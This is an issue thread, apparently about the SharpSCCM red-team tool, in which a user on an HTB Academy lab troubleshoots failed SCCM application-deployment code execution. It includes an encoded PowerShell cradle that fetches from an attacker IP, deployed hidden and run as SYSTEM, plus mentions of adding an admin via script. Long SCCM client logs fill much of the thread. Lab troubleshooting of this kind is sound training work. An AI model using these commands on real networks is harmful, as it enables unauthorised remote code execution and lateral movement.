Clarification on Unexpected Behavior

[init5-SF]

Hello, thanks for the awesome tool!

I've been using it a lot lately on HTB Academy, but I am currently facing a weird issue that had me running in circles for days.

I have tried every possible variant of the attack in the screenshot: powershell cradles, running exe payload that is hosted locally, even simple stuff like cmd /c whoami > test.txt

Every single attempt finished successfully (no errors or anything), but that's it, nothing happens and I never get command execution no matter the type.

I am using an admin account, I can launch attacks with this account from Linux using sccmhunter, but all windows tools fail.
The only thing I am suspicious about is that running scripts from sccmhunter gives me the error Hierarchy settings do not allow author's to approve their own scripts. Try using alternate approval credentials.
When I provide alternate username and password via -au & -ap args (basically logging in using 2 SCCM admins), the attack works. Not sure if that's the reason SharpSCCM is failing?

any suggestions on where to start troubleshooting would be great!

[Mayyhem]

Hey @init5-SF ! I'm not sure why execution continued after this (something I need to fix, so I'll leave this issue open), but the output says Found 0 matching devices in SMS_R_Rystem and Found 0 instances of the specified device or user with ResourceID, so the application was never deployed to SRV01.lab.local. You can use the get devices subcommand to see the correct name and resource ID for that system, then it should work with either the name (-d) or resource ID (-rid)!

[init5-SF]

Hello,

The Found 0 matching devices triggered because I used -d FQDN and the tool expects only computer account name.

Now here is the interesting part, I used -rid and this time the computer account was found, but the payload still didnt get executed

I tried again with -d and a local payload, same thing, successful completion but nothing got executed.

Finally I repeated the same test without -s and got the same results.

I have admin access to the SCCM server itself. What do you suggest I troubleshoot next?

EDIT: I also tried with the absolute path of the binary. i.e. -p "c:\windows\system32\cmd.exe /c ..." and got the same results.

[Mayyhem]

Progress! All looks correct on the server side. I'd be surprised if this was the case in a lab, but in larger real world environments, sometimes the default wait period of 300 seconds isn't long enough for the deployment to complete, and sometimes the "forcing all members to retrieve machine policy" doesn't work. You could try increasing the time with the -w option and/or running the individual steps wrapped by exec manually (new collection, new collection-member, new application, new deployment, and invoke update). You can also force a machine policy update on the client side in Control Panel > System > Configuration Manager > Actions if you have GUI access and are just troubleshooting this.

I'd also check the logs on both the server and client device -- it looks like more of a client side issue. They're in C:\Windows\CCM\Logs and you can view them all as they occur by opening them all at once and selecting "Merge selected files" using CMTrace. Or you can grep through them for "powershell" and see what comes back. The primary site server logs are in C:\Program Files\Microsoft Configuration Manager\Logs. I don't recall which specific files pertain to application deployment, but here's a really good reference for the different files: https://learn.microsoft.com/en-us/intune/configmgr/core/plan-design/hierarchy/log-files

There's always a chance EDR is blocking you as well, especially considering you're trying to create local files and they aren't showing up, although I haven't seen that before for this execution technique.

[Mayyhem]

One other thing I can think of that has bitten people in the past (and another I should fix so that execution doesn't continue) -- are you positive that SRV01 is a client? In the result of get devices, is Client: 1 for that device?

[init5-SF]

Ok so on the client (SRV01) I emptied all files in C:\Windows\CCM\Logs and then ran this

2 files in the logs folder got populated with entries immediately, one of which has the name of the user rai the account i am running SharpSCCM with, I couldn't find anything useful in the files but I've attached both in case you can find anything.

SCNotify_LAB@rai_2.log

SensorManagedProvider.Log

I ran the whole thing from the main SCCM server itself, still couldn't find anything useful, I searched in all logs folders on both SRV01 and SCCM01 using gci -file -Force -ErrorAction SilentlyContinue | sls -Pattern "bypass"
Tried different patterns like "SRV01", "powershell", "-enc" etc.

Also yes, SRV01 is a client

Regarding EDR, this lab has none, and Defender is disabled with GPO.
Finally, I added -w 600 and waited for it to finish, even though I don't think this is the reason, the environment is very small, but at least it gave me some time to check the SCCM console.

From the console side, I can see the device and the app deployment

But I am not sure how to troubleshoot this any further, I am running out of tricks 🤔

[Mayyhem]

Do you have access to SRV01 to check the logs there? You mentioned that SCCMHunter worked -- you can use the ls and cat commands or you could launch an agent / add an admin with script and RDP to the box to read the logs in C:\Windows\CCM\Logs. They should contain that Application_ and "powershell" if the app ever made it down to the client. in If they don't, try running SharpSCCM invoke update on the client and see if the logs change. That's supposed to force the machine to download its machine policy.

[init5-SF]

I added an admin with SCCMHunter using the script command with a powershell script

on SRV01 I found traces for "powershell" in a file called mtrmgr-20250723-110334.log
the entry looks like this:
mtrmgr-20250723-110334.log:1108:<![LOG[Deleting aged record: CCM_RecentlyUsedApps.ExplorerFileName="powershell.exe",FolderPath="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\",LastUserName="LAB\\rai"]LOG]!><time="11:01:26.236-120" date="07-23-2025" component="mtrmgr" context="" type="1" thread="1760" file="activeprocesses.cpp:320">

and in a file called scripts.log
entry:

<![LOG[Run the PowerShell Script: [424CC8DC-7872-4D77-B114-47E9E6BB455A]]LOG]!><time="11:10:25.783-120" date="07-23-2025" component="Scripts" context="" type="1" thread="84" file="endpoint.cpp:1055">
<![LOG[PowerShell path: C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe]LOG]!><time="11:10:25.783-120" date="07-23-2025" component="Scripts" context="" type="1" thread="84" file="endpoint.cpp:1114">
<![LOG[Launching the PowerShell.exe for Script [424CC8DC-7872-4D77-B114-47E9E6BB455A]]LOG]!><time="11:10:25.783-120" date="07-23-2025" component="Scripts" context="" type="1" thread="84" file="endpoint.cpp:1158">

I did not find any Application_ files though, even when I ran SharpSCCM

[Mayyhem]

The string "Application_" should be within some of the log files (see below), but seeing that the full installation path string for the application ("powershell iwr") didn't make it into the logs makes me think the machine policy containing the deployment info may have never been downloaded. The log you're seeing may be related to the SCCMHunter script command.

PS C:\Windows\ccm\Logs> Get-ChildItem -File | Select-String "Application_" | Select-Object -ExpandProperty Filename -Unique
AppDiscovery.log
AppEnforce.log
AppIntentEval.log
CIDownloader-20240920-203315.log
CIStateStore.log
CIStore.log
CITaskMgr.log
DataTransferService-20240730-174808.log
DCMReporting-20240502-160901.log
DCMReporting.log

[init5-SF]

ok I re-did the test
First I emptied all log files under C:\Windows\ccm\Logs on the client SRV01

then ran the tool

C:\Users\rai\Desktop>SharpSCCM.exe exec -s -d SRV01 --no-banner -sms 172.50.0.40 -p "powershell.exe -exec bypass -enc YwB1AHIAbAAgAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA2AC4ANgA5AC8AeAB4AHgA"

[+] Querying the local WMI repository for the current management point and site code
[+] Connecting to \\127.0.0.1\root\CCM
[+] Current management point: SCCM01.lab.local
[+] Site code: HTB
[+] Using WMI provider: 172.50.0.40
[+] Connecting to \\172.50.0.40\root\SMS\site_HTB
[+] Creating new device collection: Devices_d79c5d06-2595-4335-9569-0d9df3ee92ec
[+] Successfully created collection
[+] Found resource named SRV01 with ResourceID 16777247
[+] Added SRV01 (16777247) to Devices_d79c5d06-2595-4335-9569-0d9df3ee92ec
[+] Waiting for new collection member to become available...
[+] New collection member is not available yet... trying again in 5 seconds
[+] Successfully added SRV01 (16777247) to Devices_d79c5d06-2595-4335-9569-0d9df3ee92ec
[+] Creating new application: Application_7c6fabaa-543a-4030-851e-12ca353ca2f6
[+] Application path: powershell.exe -exec bypass -enc YwB1AHIAbAAgAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA2AC4ANgA5AC8AeAB4AHgA
[+] Updated application to hide it from the Configuration Manager console
[+] Updated application to run as SYSTEM
[+] Successfully created application
[+] Creating new deployment of Application_7c6fabaa-543a-4030-851e-12ca353ca2f6 to Devices_d79c5d06-2595-4335-9569-0d9df3ee92ec (HTB00044)
[+] Found the Application_7c6fabaa-543a-4030-851e-12ca353ca2f6 application
[+] Successfully created deployment of Application_7c6fabaa-543a-4030-851e-12ca353ca2f6 to Devices_d79c5d06-2595-4335-9569-0d9df3ee92ec (HTB00044)
[+] New deployment name: Application_7c6fabaa-543a-4030-851e-12ca353ca2f6_HTB00044_Install
[+] Waiting for new deployment to become available...
[+] New deployment is available, waiting 30 seconds for updated policy to become available
[+] Forcing all members of Devices_d79c5d06-2595-4335-9569-0d9df3ee92ec (HTB00044) to retrieve machine policy and execute any new applications available
[+] Waiting 300 seconds for execution to complete...
[+] Cleaning up
[+] Found the Application_7c6fabaa-543a-4030-851e-12ca353ca2f6_HTB00044_Install deployment
[+] Deleted the Application_7c6fabaa-543a-4030-851e-12ca353ca2f6_HTB00044_Install deployment
[+] Querying for deployments of Application_7c6fabaa-543a-4030-851e-12ca353ca2f6_HTB00044_Install
[+] No remaining deployments named Application_7c6fabaa-543a-4030-851e-12ca353ca2f6_HTB00044_Install were found
[+] Found the Application_7c6fabaa-543a-4030-851e-12ca353ca2f6 application
[+] Deleted the Application_7c6fabaa-543a-4030-851e-12ca353ca2f6 application
[+] Querying for applications named Application_7c6fabaa-543a-4030-851e-12ca353ca2f6
[+] No remaining applications named Application_7c6fabaa-543a-4030-851e-12ca353ca2f6 were found
[+] Deleted the Devices_d79c5d06-2595-4335-9569-0d9df3ee92ec collection (HTB00044)
[+] Querying for the Devices_d79c5d06-2595-4335-9569-0d9df3ee92ec collection (HTB00044)
[+] Found 0 collections matching the specified CollectionID
[+] No remaining collections named Devices_d79c5d06-2595-4335-9569-0d9df3ee92ec with CollectionID HTB00044 were found
[+] Completed execution in 00:07:07.7177068

Next, in the logs folder, I ran Get-ChildItem -File | Select-String "Application_" | Select-Object -ExpandProperty Filename -Unique and it only showed 1 file called StateMessage.log
The file content are:

<![LOG[Processing PreStartup event]LOG]!><time="18:33:00.340-120" date="07-24-2025" component="StateMessage" context="" type="1" thread="5516" file="statemsg.cpp:1720">
<![LOG[[IsClientOnVolatileDesktop] bVirtual=0 bMachineChangesPersisted=1 bAssignedToUser=1 bClientOnVolatileDesktop=0]LOG]!><time="18:33:00.356-120" date="07-24-2025" component="StateMessage" context="" type="1" thread="5516" file="CcmUtilLib.cpp:3699">
<![LOG[State message with TopicType 500:SUM_UPDATE_DETECTION and TopicId * has been updated]LOG]!><time="18:33:04.856-120" date="07-24-2025" component="StateMessage" context="" type="1" thread="2944" file="statemsg.cpp:710">
<![LOG[Aging out message in WMI with TopicType 1600:USER_AFFINITY and TopicId lab/rai_Auto0]LOG]!><time="18:33:04.903-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/Application_c595717f-408b-4242-97fd-ffb49495bba0/2]LOG]!><time="18:33:04.949-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/DeploymentType_686d3507-0427-4bd1-b080-0ade1812608c/2]LOG]!><time="18:33:04.981-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/RequiredApplication_c595717f-408b-4242-97fd-ffb49495bba0/2]LOG]!><time="18:33:05.028-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/DeploymentType_686d3507-0427-4bd1-b080-0ade1812608c/2]LOG]!><time="18:33:05.028-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/Application_c595717f-408b-4242-97fd-ffb49495bba0/2]LOG]!><time="18:33:05.028-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/RequiredApplication_c595717f-408b-4242-97fd-ffb49495bba0/2]LOG]!><time="18:33:05.043-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1703:APP_CI_ASSIGNMENT_EVALUATION and TopicId {CB3944BE-9ECA-45E7-AAA4-59199B900C39}]LOG]!><time="18:33:05.074-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/Application_9b167afb-e08e-4efd-b798-187c9e79c9b6/1]LOG]!><time="18:33:05.106-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/DeploymentType_96f1545c-86ce-49ba-8aac-197458b837a5/1]LOG]!><time="18:33:05.153-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/RequiredApplication_9b167afb-e08e-4efd-b798-187c9e79c9b6/1]LOG]!><time="18:33:05.215-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/DeploymentType_96f1545c-86ce-49ba-8aac-197458b837a5/1]LOG]!><time="18:33:05.215-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/Application_9b167afb-e08e-4efd-b798-187c9e79c9b6/1]LOG]!><time="18:33:05.231-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/RequiredApplication_9b167afb-e08e-4efd-b798-187c9e79c9b6/1]LOG]!><time="18:33:05.231-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/Application_78f8b6d0-30dc-4b1a-b58b-dfaf5b740702/1]LOG]!><time="18:33:05.262-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/DeploymentType_97b7e981-e414-40aa-9984-e768fbb11dff/1]LOG]!><time="18:33:05.309-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/RequiredApplication_78f8b6d0-30dc-4b1a-b58b-dfaf5b740702/1]LOG]!><time="18:33:05.340-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/DeploymentType_97b7e981-e414-40aa-9984-e768fbb11dff/1]LOG]!><time="18:33:05.356-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/Application_78f8b6d0-30dc-4b1a-b58b-dfaf5b740702/1]LOG]!><time="18:33:05.356-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 800:CLIENT_DEPLOYMENT and TopicId {00000000-0000-0000-0000-000000000001}]LOG]!><time="18:33:05.356-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1660:SENSOR_STATUS and TopicId STATE_STATEID_SENSOR_ON]LOG]!><time="18:33:05.356-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 2001:EP_CLIENT_DEPLOYMENT and TopicId EPDeploymentState]LOG]!><time="18:33:05.371-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 2100:WP_CLIENT_DEPLOYMENT and TopicId WPDeploymentState]LOG]!><time="18:33:05.371-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1950:ATP_HEALTH_STATUS and TopicId ATPHealthStatus]LOG]!><time="18:33:05.371-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/Application_898c1df3-e329-44d0-bd29-6c85e45ccd1e/1]LOG]!><time="18:33:05.403-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/DeploymentType_e3b7710c-21c7-4bd6-96c0-3d8036f038bb/1]LOG]!><time="18:33:05.434-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/RequiredApplication_898c1df3-e329-44d0-bd29-6c85e45ccd1e/1]LOG]!><time="18:33:05.449-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/DeploymentType_e3b7710c-21c7-4bd6-96c0-3d8036f038bb/1]LOG]!><time="18:33:05.449-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/Application_898c1df3-e329-44d0-bd29-6c85e45ccd1e/1]LOG]!><time="18:33:05.449-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/RequiredApplication_898c1df3-e329-44d0-bd29-6c85e45ccd1e/1]LOG]!><time="18:33:05.465-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/Application_2762eb49-f4aa-486d-b772-3a4054041ddf/1]LOG]!><time="18:33:05.481-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/DeploymentType_99d62d59-38d5-4849-ab67-60ba9322affc/1]LOG]!><time="18:33:05.496-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/RequiredApplication_2762eb49-f4aa-486d-b772-3a4054041ddf/1]LOG]!><time="18:33:05.528-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/DeploymentType_99d62d59-38d5-4849-ab67-60ba9322affc/1]LOG]!><time="18:33:05.528-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/Application_2762eb49-f4aa-486d-b772-3a4054041ddf/1]LOG]!><time="18:33:05.528-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/RequiredApplication_2762eb49-f4aa-486d-b772-3a4054041ddf/1]LOG]!><time="18:33:05.528-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1703:APP_CI_ASSIGNMENT_EVALUATION and TopicId {5D823AFE-03D7-444D-B979-DFCD9E5731C7}]LOG]!><time="18:33:05.543-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1300:CLIENT_HEALTH and TopicId 1]LOG]!><time="18:33:05.559-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1600:USER_AFFINITY and TopicId lab/administrator_Auto0]LOG]!><time="18:33:05.559-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1600:USER_AFFINITY and TopicId LAB/blwasp_Auto0]LOG]!><time="18:33:05.559-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1600:USER_AFFINITY and TopicId lab/cfaith_Auto0]LOG]!><time="18:33:05.559-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1600:USER_AFFINITY and TopicId srv01/local_users_Auto0]LOG]!><time="18:33:05.559-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/RequiredApplication_78f8b6d0-30dc-4b1a-b58b-dfaf5b740702/1]LOG]!><time="18:33:05.574-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1703:APP_CI_ASSIGNMENT_EVALUATION and TopicId {102D10A0-02D8-40A7-B010-7B581EE5D522}]LOG]!><time="18:33:05.590-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1703:APP_CI_ASSIGNMENT_EVALUATION and TopicId {22E82F96-D37E-4F89-9612-CECCFD22CB0B}]LOG]!><time="18:33:05.606-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/Application_a71619e7-b4e3-4a75-bfff-72d77f9a4160/1]LOG]!><time="18:33:05.621-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/DeploymentType_a7d1af5e-16ba-44a0-8f0e-b5696e13c231/1]LOG]!><time="18:33:05.637-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/RequiredApplication_a71619e7-b4e3-4a75-bfff-72d77f9a4160/1]LOG]!><time="18:33:05.653-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/DeploymentType_a7d1af5e-16ba-44a0-8f0e-b5696e13c231/1]LOG]!><time="18:33:05.668-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/Application_a71619e7-b4e3-4a75-bfff-72d77f9a4160/1]LOG]!><time="18:33:05.668-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/RequiredApplication_a71619e7-b4e3-4a75-bfff-72d77f9a4160/1]LOG]!><time="18:33:05.668-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1703:APP_CI_ASSIGNMENT_EVALUATION and TopicId {7933B90F-2C44-45E9-8C88-27DEC58BDBB0}]LOG]!><time="18:33:05.684-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/Application_9bca8138-6e1a-4804-8fb6-f37c7035a4cd/1]LOG]!><time="18:33:05.699-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/DeploymentType_f3849a13-9b5c-42bc-acb6-8631520f2cbe/1]LOG]!><time="18:33:05.715-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/RequiredApplication_9bca8138-6e1a-4804-8fb6-f37c7035a4cd/1]LOG]!><time="18:33:05.731-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/DeploymentType_f3849a13-9b5c-42bc-acb6-8631520f2cbe/1]LOG]!><time="18:33:05.731-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/Application_9bca8138-6e1a-4804-8fb6-f37c7035a4cd/1]LOG]!><time="18:33:05.731-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/RequiredApplication_9bca8138-6e1a-4804-8fb6-f37c7035a4cd/1]LOG]!><time="18:33:05.746-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1703:APP_CI_ASSIGNMENT_EVALUATION and TopicId {F2587C2C-655A-4974-99F8-AC0245F21E65}]LOG]!><time="18:33:05.762-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/Application_b5084966-2120-4a13-8379-121fb637ddf7/1]LOG]!><time="18:33:05.778-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/DeploymentType_233a1765-6e57-4676-a75f-7d785de2388d/1]LOG]!><time="18:33:05.793-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1701:APP_CI_COMPLIANCE and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/RequiredApplication_b5084966-2120-4a13-8379-121fb637ddf7/1]LOG]!><time="18:33:05.809-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
